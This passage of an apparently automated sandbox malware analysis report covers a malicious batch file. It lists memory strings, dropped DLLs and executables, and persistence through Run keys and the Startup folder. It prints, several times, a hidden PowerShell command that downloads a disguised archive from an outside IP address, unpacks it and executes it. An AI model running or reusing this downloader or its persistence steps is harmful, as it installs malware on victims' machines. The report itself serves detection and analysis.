    Source: powershell.exe, 00000006.00000002.393452854.000002AF80211000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://s.symcd.com06
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://s2.symcb.com0
    Source: powershell.exe, 00000006.00000002.391902549.000002AF80001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0a
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://sf.symcd.com0&
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://sv.symcd.com0&
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: powershell.exe, 00000006.00000003.286143281.000002AFFAF18000.00000004.00000001.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: powershell.exe, 00000006.00000003.286143281.000002AFFAF18000.00000004.00000001.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: powershell.exe, 00000006.00000003.286143281.000002AFFAF18000.00000004.00000001.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: powershell.exe, 00000006.00000002.393452854.000002AF80211000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000006.00000003.362636058.000002AFFAF20000.00000004.00000001.sdmpString found in binary or memory: http://www.openssl.org/V
    Source: CrystalNet-LTD@b52.exe, 00000016.00000000.388273150.0000000000106000.00000002.00020000.sdmpString found in binary or memory: http://www.symantec.com/connect/articles/creating-application-control-exclusions-symantec-endpoint-p
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://www.symauth.com/cps0(
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: http://www.symauth.com/rpa00
    Source: powershell.exe, 00000006.00000002.404801764.000002AF90062000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000006.00000002.404801764.000002AF90062000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000006.00000002.404801764.000002AF90062000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: https://d.symcb.com/cps0%
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: https://d.symcb.com/rpa0
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
    Source: powershell.exe, 00000006.00000002.393452854.000002AF80211000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000006.00000002.404801764.000002AF90062000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: CrystalNet-LTD@b52.exe, 00000016.00000001.389126643.0000000000090000.00000002.00020000.sdmpString found in binary or memory: https://www.virtualbox.org/

    System Summary:

    barindex
    Powershell drops PE fileShow sources
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\CrystalNet-LTD@b52\mpr.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\CrystalNet-LTD@b52\libeay32.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\CrystalNet-LTD@b52\borlndmm.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\CrystalNet-LTD@b52\bin.exeJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFA16A596256_2_00007FFA16A59625
    Source: Joe Sandbox ViewDropped File: C:\ProgramData\CrystalNet-LTD@b52\borlndmm.dll B3CC3F8B65B37A807843E07C3848EBA3B86F6E2D0B67C6D7CB14E9660A881618
    Source: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exeProcess token adjusted: SecurityJump to behavior
    Source: bin.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: bin.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: bin.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exeSection loaded: mpr.dllJump to behavior
    Source: classification engineClassification label: mal80.evad.winBAT@14/11@0/1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210707Jump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_01
    Source: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exeMutant created: \Sessions\1\BaseNamedObjects\VBoxTray
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vpvya31p.hu3.ps1Jump to behavior
    Source: Yara matchFile source: C:\ProgramData\CrystalNet-LTD@b52\mpr.dll, type: DROPPED
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\9.bat' '
    Source: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: 9.batReversingLabs: Detection: 15%
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\9.bat' '
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c echo %charpool:~11,1%
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c echo %charpool:~5,1%
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c echo %charpool:~2,1%
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe'
    Source: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet explorer\iexplore.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c echo %charpool:~11,1%Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c echo %charpool:~5,1%Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c echo %charpool:~2,1%Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}'Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe' Jump to behavior
    Source: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet explorer\iexplore.exeJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2h-x32\out32dll\ssleay32.pdb source: powershell.exe, 00000006.00000003.362636058.000002AFFAF20000.00000004.00000001.sdmp
    Source: Binary string: D:\tinderbox\add\out\win.x86\release\obj\VBoxTray\VBoxTray.pdb source: CrystalNet-LTD@b52.exe, 00000016.00000000.388273150.0000000000106000.00000002.00020000.sdmp

    Data Obfuscation:

    barindex
    Suspicious powershell command line foundShow sources
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}'Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFA16A59625 push edi; retf 5B85h6_2_00007FFA16A599A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFA16B20C8D push ds; ret 6_2_00007FFA16B20CAA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\CrystalNet-LTD@b52\mpr.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\CrystalNet-LTD@b52\libeay32.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\CrystalNet-LTD@b52\borlndmm.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\CrystalNet-LTD@b52\bin.exeJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\CrystalNet-LTD@b52\mpr.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\CrystalNet-LTD@b52\libeay32.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\CrystalNet-LTD@b52\borlndmm.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\CrystalNet-LTD@b52\bin.exeJump to dropped file

    Boot Survival:

    barindex
    Creates autostart registry keys with suspicious namesShow sources
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run computerJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CrystalNet-LTD@b52.exe.lnkJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CrystalNet-LTD@b52.exe.lnkJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run computerJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run computerJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess